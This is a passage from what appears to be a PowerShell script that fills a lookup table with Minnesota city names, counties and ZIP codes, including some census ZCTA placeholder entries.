$Cities.Rows.Add("Sawyer","Carlton","Minnesota","MN","27","55780") + $null = $Cities.Rows.Add("Side lake","St. Louis","Minnesota","MN","27","55781") + $null = $Cities.Rows.Add("Soudan","St. Louis","Minnesota","MN","27","55782") + $null = $Cities.Rows.Add("Sturgeon lake","Pine","Minnesota","MN","27","55783") + $null = $Cities.Rows.Add("Swan river","Itasca","Minnesota","MN","27","55784") + $null = $Cities.Rows.Add("Swatara","Aitkin","Minnesota","MN","27","55785") + $null = $Cities.Rows.Add("Taconite","Itasca","Minnesota","MN","27","55786") + $null = $Cities.Rows.Add("Tamarack","Aitkin","Minnesota","MN","27","55787") + $null = $Cities.Rows.Add("Tower","St. Louis","Minnesota","MN","27","55790") + $null = $Cities.Rows.Add("Virginia","St. Louis","Minnesota","MN","27","55792") + $null = $Cities.Rows.Add("Warba","Itasca","Minnesota","MN","27","55793") + $null = $Cities.Rows.Add("Willow river","Pine","Minnesota","MN","27","55795") + $null = $Cities.Rows.Add("Winton","St. Louis","Minnesota","MN","27","55796") + $null = $Cities.Rows.Add("Wrenshall","Carlton","Minnesota","MN","27","55797") + $null = $Cities.Rows.Add("Wright","Carlton","Minnesota","MN","27","55798") + $null = $Cities.Rows.Add("Zcta 557hh","Aitkin","Minnesota","MN","27","557HH") + $null = $Cities.Rows.Add("Zcta 557xx","Lake","Minnesota","MN","27","557XX") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55802") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55803") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55804") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55805") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55806") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55807") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55808") + $null = $Cities.Rows.Add("Proctor","St. Louis","Minnesota","MN","27","55810") + $null = $Cities.Rows.Add("Hermantown","St. Louis","Minnesota","MN","27","55811") + $null = $Cities.Rows.Add("Duluth","St. Louis","Minnesota","MN","27","55812") + $null = $Cities.Rows.Add("Zcta 558hh","St. Louis","Minnesota","MN","27","558HH") + $null = $Cities.Rows.Add("Rochester","Olmsted","Minnesota","MN","27","55901") + $null = $Cities.Rows.Add("Rochester","Olmsted","Minnesota","MN","27","55902") + $null = $Cities.Rows.Add("Rochester","Olmsted","Minnesota","MN","27","55904") + $null = $Cities.Rows.Add("Rochester","Olmsted","Minnesota","MN","27","55906") + $null = $Cities.Rows.Add("Adams","Mower","Minnesota","MN","27","55909") + $null = $Cities.Rows.Add("Altura","Winona","Minnesota","MN","27","55910") + $null = $Cities.Rows.Add("Austin","Mower","Minnesota","MN","27","55912") + $null = $Cities.Rows.Add("Blooming prairie","Steele","Minnesota","MN","27","55917") + $null = $Cities.Rows.Add("Brownsdale","Mower","Minnesota","MN","27","55918") + $null = $Cities.Rows.Add("Brownsville","Houston","Minnesota","MN","27","55919") + $null = $Cities.Rows.Add("Byron","Olmsted","Minnesota","MN","27","55920") + $null = $Cities.Rows.Add("Caledonia","Houston","Minnesota","MN","27","55921") + $null = $Cities.Rows.Add("Canton","Fillmore","Minnesota","MN","27","55922") + $null = $Cities.Rows.Add("Chatfield","Fillmore","Minnesota","MN","27","55923") + $null = $Cities.Rows.Add("Claremont","Dodge","Minnesota","MN","27","55924") + $null = $Cities.Rows.Add("Dakota","Winona","Minnesota","MN","27","55925") + $null = $Cities.Rows.Add("Dexter","Mower","Minnesota","MN","27","55926") + $null = $Cities.Rows.Add("Dodge center","Dodge","Minnesota","MN","27","55927") + $null = $Cities.Rows.Add("Dover","Olmsted","Minnesota","MN","27","55929") + $null = $Cities.Rows.Add("Eitzen","Houston","Minnesota","MN","27","55931") + $null = $Cities.Rows.Add("Elgin","Wabasha","Minnesota","MN","27","55932") + $null = $Cities.Rows.Add("Elkton","Mower","Minnesota","MN","27","55933") + $null = $Cities.Rows.Add("Viola","Olmsted","Minnesota","MN","27","55934") + $null = $Cities.Rows.Add("Fountain","Fillmore","Minnesota","MN","27","55935") + $null = $Cities.Rows.Add("Grand meadow","Mower","Minnesota","MN","27","55936") + $null = $Cities.Rows.Add("Harmony","Fillmore","Minnesota","MN","27","55939") + $null = $Cities.Rows.Add("Hayfield","Dodge","Minnesota","MN","27","55940") + $null = $Cities.Rows.Add("Hokah","Houston","Minnesota","MN","27","55941") + $null = $Cities.Rows.Add("Houston","Houston","Minnesota","MN","27","55943") + $null = $Cities.Rows.Add("Kasson","Dodge","Minnesota","MN","27","55944") + $null = $Cities.Rows.Add("Theilman","Wabasha","Minnesota","MN","27","55945") + $null = $Cities.Rows.Add("Kenyon","Goodhue","Minnesota","MN","27","55946") + $null = $Cities.Rows.Add("La crescent","Houston","Minnesota","MN","27","55947") + $null = $Cities.Rows.Add("Lanesboro","Fillmore","Minnesota","MN","27","55949") + $null = $Cities.Rows.Add("Lansing","Mower","Minnesota","MN","27","55950") + $null = $Cities.Rows.Add("Le roy","Mower","Minnesota","MN","27","55951") + $null = $Cities.Rows.Add("Lewiston","Winona","Minnesota","MN","27","55952") + $null = $Cities.Rows.Add("Lyle","Mower","Minnesota","MN","27","55953") + $null = $Cities.Rows.Add("Mabel","Fillmore","Minnesota","MN","27","55954") + $null = $Cities.Rows.Add("Mantorville","Dodge","Minnesota","MN","27","55955") + $null = $Cities.Rows.Add("Mazeppa","Wabasha","Minnesota","MN","27","55956") + $null = $Cities.Rows.Add("Millville","Wabasha","Minnesota","MN","27","55957") + $null = $Cities.Rows.Add("Minnesota city","Winona","Minnesota","MN","27","55959") + $null = $Cities.Rows.Add("Oronoco","Olmsted","Minnesota","MN","27","55960") + $null = $Cities.Rows.Add("Ostrander","Fillmore","Minnesota","MN","27","55961") + $null = $Cities.Rows.Add("Peterson","Fillmore","Minnesota","MN","27","55962") + $null = $Cities.Rows.Add("Pine island","Goodhue","Minnesota","MN","27","55963") + $null = $Cities.Rows.Add("Plainview","Wabasha","Minnesota","MN","27","55964") + $null = $Cities.Rows.Add("Preston","Fillmore","Minnesota","MN","27","55965") + $null = $Cities.Rows.Add("Racine","Mower","Minnesota","MN","27","55967") + $null = $Cities.Rows.Add("Rollingstone","Winona","Minnesota","MN","27","55969") + $null = $Cities.Rows.Add("Rose creek","Mower","Minnesota","MN","27","55970") + $null = $Cities.Rows.Add("Rushford","Fillmore","Minnesota","MN","27","55971") + $null = $Cities.Rows.Add("Saint charles","Winona","Minnesota","MN","27","55972") + $null = $Cities.Rows.Add("Sargeant","Mower","Minnesota","MN","27","55973") + $null = $Cities.Rows.Add("Spring grove","Houston","Minnesota","MN","27","55974") + $null = $Cities.Rows.Add("Spring valley","Fillmore","Minnesota","MN","27","55975") + $null = $Cities.Rows.Add("Stewartville","Olmsted","Minnesota","MN","27","55976") + $null = $Cities.Rows.Add("Taopi","Mower","Minnesota","MN","27","55977") + $null = $Cities.Rows.Add("Utica","Winona","Minnesota","MN","27","55979") + $null = $Cities.Rows.Add("Wabasha","Wabasha","Minnesota","MN","27","55981") + $null = $Cities.Rows.Add("Waltham","Mower","Minnesota","MN","27","55982") + $null = $Cities.Rows.Add("Wanamingo","Goodhue","Minnesota","MN","27","55983") + $null = $Cities.Rows.Add("West concord","Dodge","Minnesota","MN","27","55985") + $null = $Cities.Rows.Add("Goodview","Winona","Minnesota","MN","27","55987") + $null = $Cities.Rows.Add("Stockton","Winona","Minnesota","MN","27","55988") + $null = $Cities.Rows.Add("Wykoff","Fillmore","Minnesota","MN","27","55990") + $null = $Cities.Rows.Add("Hammond","Wabasha","Minnesota","MN","27","55991") + $null = $Cities.Rows.Add("Zumbrota","Goodhue","Minnesota","MN","27","55992") + $null = $Cities.Rows.Add("Zcta 559hh","Fillmore","Minnesota","MN","27","559HH") + $null = $Cities.Rows.Add("Mankato","Blue Earth","Minnesota","MN","27","56001") + $null = $Cities.Rows.Add("North mankato","Nicollet","Minnesota","MN","27","56003") + $null = $Cities.Rows.Add("Albert lea","Freeborn","Minnesota","MN","27","56007") + $null = $Cities.Rows.Add("Alden","Freeborn","Minnesota","MN","27","56009") + $null = $Cities.Rows.Add("Amboy","Blue Earth","Minnesota","MN","27","56010") + $null = $Cities.Rows.Add("Belle plaine","Scott","Minnesota","MN","27","56011") + $null = $Cities.Rows.Add("Blue earth","Faribault","Minnesota","MN","27","56013") + $null = $Cities.Rows.Add("Bricelyn","Faribault","Minnesota","MN","27","56014") + $null = $Cities.Rows.Add("Clarks grove","Freeborn","Minnesota","MN","27","56016") + $null = $Cities.Rows.Add("Cleveland","Le Sueur","Minnesota","MN","27","56017") + $null = $Cities.Rows.Add("Comfrey","Brown","Minnesota","MN","27","56019") + $null = $Cities.Rows.Add("Conger","Freeborn","Minnesota","MN","27","56020") + $null = $Cities.Rows.Add("Courtland","Nicollet","Minnesota","MN","27","56021") + $null = $Cities.Rows.Add("Darfur","Watonwan","Minnesota","MN","27","56022") + $null = $Cities.Rows.Add("Delavan","Faribault","Minnesota","MN","27","56023") + $null = $Cities.Rows.Add("Eagle lake","Blue Earth","Minnesota","MN","27","56024") + $null = $Cities.Rows.Add("Easton","Faribault","Minnesota","MN","27","56025") + $null = $Cities.Rows.Add("Ellendale","Steele","Minnesota","MN","27","56026") + $null = $Cities.Rows.Add("Elmore","Faribault","Minnesota","MN","27","56027") + $null = $Cities.Rows.Add("Elysian","Le Sueur","Minnesota","MN","27","56028") + $null = $Cities.Rows.Add("Emmons","Freeborn","Minnesota","MN","27","56029") + $null = $Cities.Rows.Add("Fairmont","Martin","Minnesota","MN","27","56031") + $null = $Cities.Rows.Add("Freeborn","Freeborn","Minnesota","MN","27","56032") + $null = $Cities.Rows.Add("Frost","Faribault","Minnesota","MN","27","56033") + $null = $Cities.Rows.Add("Garden city","Blue Earth","Minnesota","MN","27","56034") + $null = $Cities.Rows.Add("Geneva","Freeborn","Minnesota","MN","27","56035") + $null = $Cities.Rows.Add("Glenville","Freeborn","Minnesota","MN","27","56036") + $null = $Cities.Rows.Add("Good thunder","Blue Earth","Minnesota","MN","27","56037") + $null = $Cities.Rows.Add("Granada","Martin","Minnesota","MN","27","56039") + $null = $Cities.Rows.Add("Hanska","Brown","Minnesota","MN","27","56041") + $null = $Cities.Rows.Add("Hartland","Freeborn","Minnesota","MN","27","56042") + $null = $Cities.Rows.Add("Hayward","Freeborn","Minnesota","MN","27","56043") + $null = $Cities.Rows.Add("Henderson","Sibley","Minnesota","MN","27","56044") + $null = $Cities.Rows.Add("Hollandale","Freeborn","Minnesota","MN","27","56045") + $null = $Cities.Rows.Add("Janesville","Waseca","Minnesota","MN","27","56048") + $null = $Cities.Rows.Add("Kasota","Le Sueur","Minnesota","MN","27","56050") + $null = $Cities.Rows.Add("Kiester","Faribault","Minnesota","MN","27","56051") + $null = $Cities.Rows.Add("Kilkenny","Le Sueur","Minnesota","MN","27","56052") + $null = $Cities.Rows.Add("Lafayette","Nicollet","Minnesota","MN","27","56054") + $null = $Cities.Rows.Add("Lake crystal","Blue Earth","Minnesota","MN","27","56055") + $null = $Cities.Rows.Add("La salle","Watonwan","Minnesota","MN","27","56056") + $null = $Cities.Rows.Add("Le center","Le Sueur","Minnesota","MN","27","56057") + $null = $Cities.Rows.Add("Le sueur","Le Sueur","Minnesota","MN","27","56058") + $null = $Cities.Rows.Add("Lewisville","Watonwan","Minnesota","MN","27","56060") + $null = $Cities.Rows.Add("Madelia","Watonwan","Minnesota","MN","27","56062") + $null = $Cities.Rows.Add("Madison lake","Blue Earth","Minnesota","MN","27","56063") + $null = $Cities.Rows.Add("Manchester","Freeborn","Minnesota","MN","27","56064") + $null = $Cities.Rows.Add("Mapleton","Blue Earth","Minnesota","MN","27","56065") + $null = $Cities.Rows.Add("Minnesota lake","Faribault","Minnesota","MN","27","56068") + $null = $Cities.Rows.Add("Montgomery","Le Sueur","Minnesota","MN","27","56069") + $null = $Cities.Rows.Add("New prague","Scott","Minnesota","MN","27","56071") + $null = $Cities.Rows.Add("New richland","Waseca","Minnesota","MN","27","56072") + $null = $Cities.Rows.Add("New ulm","Brown","Minnesota","MN","27","56073") + $null = $Cities.Rows.Add("Nicollet","Nicollet","Minnesota","MN","27","56074") + $null = $Cities.Rows.Add("Northrop","Martin","Minnesota","MN","27","56075") + $null = $Cities.Rows.Add("Oakland","Freeborn","Minnesota","MN","27","56076") + $null = $Cities.Rows.Add("Pemberton","Blue Earth","Minnesota","MN","27","56078") + $null = $Cities.Rows.Add("Saint clair","Blue Earth","Minnesota","MN","27","56080") + $null = $Cities.Rows.Add("Saint james","Watonwan","Minnesota","MN","27","56081") + $null = $Cities.Rows.Add("Saint peter","Nicollet","Minnesota","MN","27","56082") + $null = $Cities.Rows.Add("Sanborn","Redwood","Minnesota","MN","27","56083") + $null = $Cities.Rows.Add("Sleepy eye","Brown","Minnesota","MN","27","56085") + $null = $Cities.Rows.Add("Springfield","Brown","Minnesota","MN","27","56087") + $null = $Cities.Rows.Add("Truman","Martin","Minnesota","MN","27","56088") + $null = $Cities.Rows.Add("Twin lakes","Freeborn","Minnesota","MN","27","56089") + $null = $Cities.Rows.Add("Vernon center","Blue Earth","Minnesota","MN","27","56090") + $null = $Cities.Rows.Add("Waldorf","Waseca","Minnesota","MN","27","56091") + $null = $Cities.Rows.Add("Waseca","Waseca","Minnesota","MN","27","56093") + $null = $Cities.Rows.Add("Waterville","Le Sueur","Minnesota","MN","27","56096") + $null = $Cities.Rows.Add("Wells","Faribault","Minnesota","MN","27","56097") + $null = $Cities.Rows.Add("Winnebago","Faribault","Minnesota","MN","27","56098") + $null = $Cities.Rows.Add("Zcta 560hh","Blue Earth","Minnesota","MN","27","560HH") + $null = $Cities.Rows.Add("Wilder","Cottonwood","Minnesota","MN","27","56101") + $null = $Cities.Rows.Add("Adrian","Nobles","Minnesota","MN","27","56110") + $null = $Cities.Rows.Add("Alpha","Jackson","Minnesota","MN","27","56111") + $null = $Cities.Rows.Add("Arco","Lincoln","Minnesota","MN","27","56113") + $null = $Cities.Rows.Add("Avoca","Murray","Minnesota","MN","27","56114") + $null = $Cities.Rows.Add("Balaton","Lyon","Minnesota","MN","27","56115") + $null = $Cities.Rows.Add("Beaver creek","Rock","Minnesota","MN","27","56116") + $null = $Cities.Rows.Add("Bigelow","Nobles","Minnesota","MN","27","56117") + $null = $Cities.Rows.Add("Bingham lake","Cottonwood","Minnesota","MN","27","56118") + $null = $Cities.Rows.Add("Brewster","Nobles","Minnesota","MN","27","56119") + $null = $Cities.Rows.Add("Butterfield","Watonwan","Minnesota","MN","27","56120") + $null = $Cities.Rows.Add("Ceylon","Martin","Minnesota","MN","27","56121") + $null = $Cities.Rows.Add("Chandler","Murray","Minnesota","MN","27","56122") + $null = $Cities.Rows.Add("Currie","Murray","Minnesota","MN","27","56123") + $null = $Cities.Rows.Add("Dunnell","Martin","Minnesota","MN","27","56127") + $null = $Cities.Rows.Add("Edgerton","Pipestone","Minnesota","MN","27","56128") + $null = $Cities.Rows.Add("Ellsworth","Nobles","Minnesota","MN","27","56129") + $null = $Cities.Rows.Add("Fulda","Murray","Minnesota","MN","27","56131") + $null = $Cities.Rows.Add("Garvin","Lyon","Minnesota","MN","27","56132") + $null = $Cities.Rows.Add("Hardwick","Rock","Minnesota","MN","27","56134") + $null = $Cities.Rows.Add("Hendricks","Lincoln","Minnesota","MN","27","56136") + $null = $Cities.Rows.Add("Heron lake","Jackson","Minnesota","MN","27","56137") + $null = $Cities.Rows.Add("Hills","Rock","Minnesota","MN","27","56138") + $null = $Cities.Rows.Add("Holland","Pipestone","Minnesota","MN","27","56139") + $null = $Cities.Rows.Add("Ihlen","Pipestone","Minnesota","MN","27","56140") + $null = $Cities.Rows.Add("Iona","Murray","Minnesota","MN","27","56141") + $null = $Cities.Rows.Add("Ivanhoe","Lincoln","Minnesota","MN","27","56142") + $null = $Cities.Rows.Add("Jackson","Jackson","Minnesota","MN","27","56143") + $null = $Cities.Rows.Add("Jasper","Pipestone","Minnesota","MN","27","56144") + $null = $Cities.Rows.Add("Jeffers","Cottonwood","Minnesota","MN","27","56145") + $null = $Cities.Rows.Add("Kenneth","Rock","Minnesota","MN","27","56147") + $null = $Cities.Rows.Add("Lake benton","Lincoln","Minnesota","MN","27","56149") + $null = $Cities.Rows.Add("Lakefield","Jackson","Minnesota","MN","27","56150") + $null = $Cities.Rows.Add("Lake wilson","Murray","Minnesota","MN","27","56151") + $null = $Cities.Rows.Add("Lamberton","Redwood","Minnesota","MN","27","56152") + $null = $Cities.Rows.Add("Leota","Nobles","Minnesota","MN","27","56153") + $null = $Cities.Rows.Add("Lismore","Nobles","Minnesota","MN","27","56155") + $null = $Cities.Rows.Add("Luverne","Rock","Minnesota","MN","27","56156") + $null = $Cities.Rows.Add("Lynd","Lyon","Minnesota","MN","27","56157") + $null = $Cities.Rows.Add("Magnolia","Rock","Minnesota","MN","27","56158") + $null = $Cities.Rows.Add("Mountain lake","Cottonwood","Minnesota","MN","27","56159") + $null = $Cities.Rows.Add("Odin","Watonwan","Minnesota","MN","27","56160") + $null = $Cities.Rows.Add("Okabena","Jackson","Minnesota","MN","27","56161") + $null = $Cities.Rows.Add("Ormsby","Martin","Minnesota","MN","27","56162") + $null = $Cities.Rows.Add("Hatfield","Pipestone","Minnesota","MN","27","56164") + $null = $Cities.Rows.Add("Reading","Nobles","Minnesota","MN","27","56165") + $null = $Cities.Rows.Add("Revere","Redwood","Minnesota","MN","27","56166") + $null = $Cities.Rows.Add("Round lake","Nobles","Minnesota","MN","27","56167") + $null = $Cities.Rows.Add("Rushmore","Nobles","Minnesota","MN","27","56168") + $null = $Cities.Rows.Add("Russell","Lyon","Minnesota","MN","27","56169") + $null = $Cities.Rows.Add("Florence","Pipestone","Minnesota","MN","27","56170") + $null = $Cities.Rows.Add("Sherburn","Martin","Minnesota","MN","27","56171") + $null = $Cities.Rows.Add("Slayton","Murray","Minnesota","MN","27","56172") + $null = $Cities.Rows.Add("Steen","Rock","Minnesota","MN","27","56173") + $null = $Cities.Rows.Add("Storden","Cottonwood","Minnesota","MN","27","56174") + $null = $Cities.Rows.Add("Tracy","Lyon","Minnesota","MN","27","56175") + $null = $Cities.Rows.Add("Trimont","Martin","Minnesota","MN","27","56176") + $null = $Cities.Rows.Add("Trosky","Pipestone","Minnesota","MN","27","56177") + $null = $Cities.Rows.Add("Tyler","Lincoln","Minnesota","MN","27","56178") + $null = $Cities.Rows.Add("Walnut grove","Redwood","Minnesota","MN","27","56180") + $null = $Cities.Rows.Add("Welcome","Martin","Minnesota","MN","27","56181") + $null = $Cities.Rows.Add("Westbrook","Cottonwood","Minnesota","MN","27","56183") + $null = $Cities.Rows.Add("Wilmont","Nobles","Minnesota","MN","27","56185") + $null = $Cities.Rows.Add("Woodstock","Pipestone","Minnesota","MN","27","56186") + $null = $Cities.Rows.Add("Worthington","Nobles","Minnesota","MN","27","56187") + $null = $Cities.Rows.Add("Zcta 561hh","Cottonwood","Minnesota","MN","27","561HH") + $null = $Cities.Rows.Add("Willmar","Kandiyohi","Minnesota","MN","27","56201") + $null = $Cities.Rows.Add("Alberta","Stevens","Minnesota","MN","27","56207") + $null = $Cities.Rows.Add("Appleton","Swift","Minnesota","MN","27","56208") + $null = $Cities.Rows.Add("Atwater","Kandiyohi","Minnesota","MN","27","56209") + $null = $Cities.Rows.Add("Beardsley","Big Stone","Minnesota","MN","27","56211") + $null = $Cities.Rows.Add("Bellingham","Lac qui Parle","Minnesota","MN","27","56212") + $null = $Cities.Rows.Add("Belview","Redwood","Minnesota","MN","27","56214") + $null = $Cities.Rows.Add("Benson","Swift","Minnesota","MN","27","56215") + $null = $Cities.Rows.Add("Svea","Kandiyohi","Minnesota","MN","27","56216") + $null = $Cities.Rows.Add("Boyd","Lac qui Parle","Minnesota","MN","27","56218") + $null = $Cities.Rows.Add("Browns valley","Traverse","Minnesota","MN","27","56219") + $null = $Cities.Rows.Add("Canby","Yellow Medicine","Minnesota","MN","27","56220") + $null = $Cities.Rows.Add("Chokio","Stevens","Minnesota","MN","27","56221") + $null = $Cities.Rows.Add("Clara city","Chippewa","Minnesota","MN","27","56222") + $null = $Cities.Rows.Add("Clarkfield","Yellow Medicine","Minnesota","MN","27","56223") + $null = $Cities.Rows.Add("Clements","Redwood","Minnesota","MN","27","56224") + $null = $Cities.Rows.Add("Clinton","Big Stone","Minnesota","MN","27","56225") + $null = $Cities.Rows.Add("Clontarf","Swift","Minnesota","MN","27","56226") + $null = $Cities.Rows.Add("Correll","Big Stone","Minnesota","MN","27","56227") + $null = $Cities.Rows.Add("Cosmos","Meeker","Minnesota","MN","27","56228") + $null = $Cities.Rows.Add("Cottonwood","Lyon","Minnesota","MN","27","56229") + $null = $Cities.Rows.Add("Danube","Renville","Minnesota","MN","27","56230") + $null = $Cities.Rows.Add("Danvers","Swift","Minnesota","MN","27","56231") + $null = $Cities.Rows.Add("Dawson","Lac qui Parle","Minnesota","MN","27","56232") + $null = $Cities.Rows.Add("Donnelly","Stevens","Minnesota","MN","27","56235") + $null = $Cities.Rows.Add("Dumont","Traverse","Minnesota","MN","27","56236") + $null = $Cities.Rows.Add("Echo","Yellow Medicine","Minnesota","MN","27","56237") + $null = $Cities.Rows.Add("Ghent","Lyon","Minnesota","MN","27","56239") + $null = $Cities.Rows.Add("Graceville","Big Stone","Minnesota","MN","27","56240") + $null = $Cities.Rows.Add("Granite falls","Yellow Medicine","Minnesota","MN","27","56241") + $null = $Cities.Rows.Add("Grove city","Meeker","Minnesota","MN","27","56243") + $null = $Cities.Rows.Add("Hancock","Stevens","Minnesota","MN","27","56244") + $null = $Cities.Rows.Add("Hanley falls","Yellow Medicine","Minnesota","MN","27","56245") + $null = $Cities.Rows.Add("Hawick","Kandiyohi","Minnesota","MN","27","56246") + $null = $Cities.Rows.Add("Herman","Grant","Minnesota","MN","27","56248") + $null = $Cities.Rows.Add("Holloway","Swift","Minnesota","MN","27","56249") + $null = $Cities.Rows.Add("Kandiyohi","Kandiyohi","Minnesota","MN","27","56251") + $null = $Cities.Rows.Add("Kerkhoven","Swift","Minnesota","MN","27","56252") + $null = $Cities.Rows.Add("Lake lillian","Kandiyohi","Minnesota","MN","27","56253") + $null = $Cities.Rows.Add("Lucan","Redwood","Minnesota","MN","27","56255") + $null = $Cities.Rows.Add("Madison","Lac qui Parle","Minnesota","MN","27","56256") + $null = $Cities.Rows.Add("Marietta","Lac qui Parle","Minnesota","MN","27","56257") + $null = $Cities.Rows.Add("Marshall","Lyon","Minnesota","MN","27","56258") + $null = $Cities.Rows.Add("Maynard","Chippewa","Minnesota","MN","27","56260") + $null = $Cities.Rows.Add("Milan","Chippewa","Minnesota","MN","27","56262") + $null = $Cities.Rows.Add("Milroy","Redwood","Minnesota","MN","27","56263") + $null = $Cities.Rows.Add("Minneota","Lyon","Minnesota","MN","27","56264") + $null = $Cities.Rows.Add("Montevideo","Chippewa","Minnesota","MN","27","56265") + $null = $Cities.Rows.Add("Morgan","Redwood","Minnesota","MN","27","56266") + $null = $Cities.Rows.Add("Morris","Stevens","Minnesota","MN","27","56267") + $null = $Cities.Rows.Add("Morton","Renville","Minnesota","MN","27","56270") + $null = $Cities.Rows.Add("Murdock","Swift","Minnesota","MN","27","56271") + $null = $Cities.Rows.Add("New london","Kandiyohi","Minnesota","MN","27","56273") + $null = $Cities.Rows.Add("Norcross","Grant","Minnesota","MN","27","56274") + $null = $Cities.Rows.Add("Odessa","Big Stone","Minnesota","MN","27","56276") + $null = $Cities.Rows.Add("Olivia","Renville","Minnesota","MN","27","56277") + $null = $Cities.Rows.Add("Ortonville","Big Stone","Minnesota","MN","27","56278") + $null = $Cities.Rows.Add("Pennock","Kandiyohi","Minnesota","MN","27","56279") + $null = $Cities.Rows.Add("Porter","Yellow Medicine","Minnesota","MN","27","56280") + $null = $Cities.Rows.Add("Prinsburg","Kandiyohi","Minnesota","MN","27","56281") + $null = $Cities.Rows.Add("Raymond","Kandiyohi","Minnesota","MN","27","56282") + $null = $Cities.Rows.Add("Delhi","Redwood","Minnesota","MN","27","56283") + $null = $Cities.Rows.Add("Renville","Renville","Minnesota","MN","27","56284") + $null = $Cities.Rows.Add("Sacred heart","Renville","Minnesota","MN","27","56285") + $null = $Cities.Rows.Add("Seaforth","Redwood","Minnesota","MN","27","56287") + $null = $Cities.Rows.Add("Spicer","Kandiyohi","Minnesota","MN","27","56288") + $null = $Cities.Rows.Add("Sunburg","Kandiyohi","Minnesota","MN","27","56289") + $null = $Cities.Rows.Add("Taunton","Lyon","Minnesota","MN","27","56291") + $null = $Cities.Rows.Add("Vesta","Redwood","Minnesota","MN","27","56292") + $null = $Cities.Rows.Add("Wabasso","Redwood","Minnesota","MN","27","56293") + $null = $Cities.Rows.Add("Wanda","Redwood","Minnesota","MN","27","56294") + $null = $Cities.Rows.Add("Watson","Chippewa","Minnesota","MN","27","56295") + $null = $Cities.Rows.Add("Wheaton","Traverse","Minnesota","MN","27","56296") + $null = $Cities.Rows.Add("Wood lake","Yellow Medicine","Minnesota","MN","27","56297") + $null = $Cities.Rows.Add("Zcta 562hh","Big Stone","Minnesota","MN","27","562HH") + $null = $Cities.Rows.Add("Zcta 562xx","Lac qui Parle","Minnesota","MN","27","562XX") + $null = $Cities.Rows.Add("Saint cloud","Stearns","Minnesota","MN","27","56301") + $null = $Cities.Rows.Add("Saint cloud","Stearns","Minnesota","MN","27","56303") + $null = $Cities.Rows.Add("Saint cloud","Sherburne","Minnesota","MN","27","56304") + $null = $Cities.Rows.Add("Albany","Stearns","Minnesota","MN","27","56307") + $null = $Cities.Rows.Add("Alexandria","Douglas","Minnesota","MN","27","56308") + $null = $Cities.Rows.Add("Ashby","Grant","Minnesota","MN","27","56309") + $null = $Cities.Rows.Add("Avon","Stearns","Minnesota","MN","27","56310") + $null = $Cities.Rows.Add("Barrett","Grant","Minnesota","MN","27","56311") + $null = $Cities.Rows.Add("Belgrade","Stearns","Minnesota","MN","27","56312") + $null = $Cities.Rows.Add("Bock","Mille Lacs","Minnesota","MN","27","56313") + $null = $Cities.Rows.Add("Bowlus","Morrison","Minnesota","MN","27","56314") + $null = $Cities.Rows.Add("Brandon","Douglas","Minnesota","MN","27","56315") + $null = $Cities.Rows.Add("Brooten","Stearns","Minnesota","MN","27","56316") + $null = $Cities.Rows.Add("Burtrum","Todd","Minnesota","MN","27","56318") + $null = $Cities.Rows.Add("Carlos","Douglas","Minnesota","MN","27","56319") + $null = $Cities.Rows.Add("Cold spring","Stearns","Minnesota","MN","27","56320") + $null = $Cities.Rows.Add("Cyrus","Pope","Minnesota","MN","27","56323") + $null = $Cities.Rows.Add("Dalton","Otter Tail","Minnesota","MN","27","56324") + $null = $Cities.Rows.Add("Elrosa","Stearns","Minnesota","MN","27","56325") + $null = $Cities.Rows.Add("Evansville","Douglas","Minnesota","MN","27","56326") + $null = $Cities.Rows.Add("Farwell","Douglas","Minnesota","MN","27","56327") + $null = $Cities.Rows.Add("Flensburg","Morrison","Minnesota","MN","27","56328") + $null = $Cities.Rows.Add("Foley","Benton","Minnesota","MN","27","56329") + $null = $Cities.Rows.Add("Foreston","Mille Lacs","Minnesota","MN","27","56330") + $null = $Cities.Rows.Add("Freeport","Stearns","Minnesota","MN","27","56331") + $null = $Cities.Rows.Add("Garfield","Douglas","Minnesota","MN","27","56332") + $null = $Cities.Rows.Add("Glenwood","Pope","Minnesota","MN","27","56334") + $null = $Cities.Rows.Add("Greenwald","Stearns","Minnesota","MN","27","56335") + $null = $Cities.Rows.Add("Grey eagle","Todd","Minnesota","MN","27","56336") + $null = $Cities.Rows.Add("Hillman","Morrison","Minnesota","MN","27","56338") + $null = $Cities.Rows.Add("Hoffman","Grant","Minnesota","MN","27","56339") + $null = $Cities.Rows.Add("Holdingford","Stearns","Minnesota","MN","27","56340") + $null = $Cities.Rows.Add("Isle","Mille Lacs","Minnesota","MN","27","56342") + $null = $Cities.Rows.Add("Kensington","Douglas","Minnesota","MN","27","56343") + $null = $Cities.Rows.Add("Little falls","Morrison","Minnesota","MN","27","56345") + $null = $Cities.Rows.Add("Little sauk","Todd","Minnesota","MN","27","56347") + $null = $Cities.Rows.Add("Lowry","Pope","Minnesota","MN","27","56349") + $null = $Cities.Rows.Add("Mc grath","Aitkin","Minnesota","MN","27","56350") + $null = $Cities.Rows.Add("Melrose","Stearns","Minnesota","MN","27","56352") + $null = $Cities.Rows.Add("Milaca","Mille Lacs","Minnesota","MN","27","56353") + $null = $Cities.Rows.Add("Miltona","Douglas","Minnesota","MN","27","56354") + $null = $Cities.Rows.Add("Nelson","Douglas","Minnesota","MN","27","56355") + $null = $Cities.Rows.Add("New munich","Stearns","Minnesota","MN","27","56356") + $null = $Cities.Rows.Add("Oak park","Benton","Minnesota","MN","27","56357") + $null = $Cities.Rows.Add("Ogilvie","Kanabec","Minnesota","MN","27","56358") + $null = $Cities.Rows.Add("Onamia","Mille Lacs","Minnesota","MN","27","56359") + $null = $Cities.Rows.Add("Osakis","Douglas","Minnesota","MN","27","56360") + $null = $Cities.Rows.Add("Parkers prairie","Otter Tail","Minnesota","MN","27","56361") + $null = $Cities.Rows.Add("Paynesville","Stearns","Minnesota","MN","27","56362") + $null = $Cities.Rows.Add("Pierz","Morrison","Minnesota","MN","27","56364") + $null = $Cities.Rows.Add("Rice","Benton","Minnesota","MN","27","56367") + $null = $Cities.Rows.Add("Richmond","Stearns","Minnesota","MN","27","56368") + $null = $Cities.Rows.Add("Rockville","Stearns","Minnesota","MN","27","56369") + $null = $Cities.Rows.Add("Roscoe","Stearns","Minnesota","MN","27","56371") + $null = 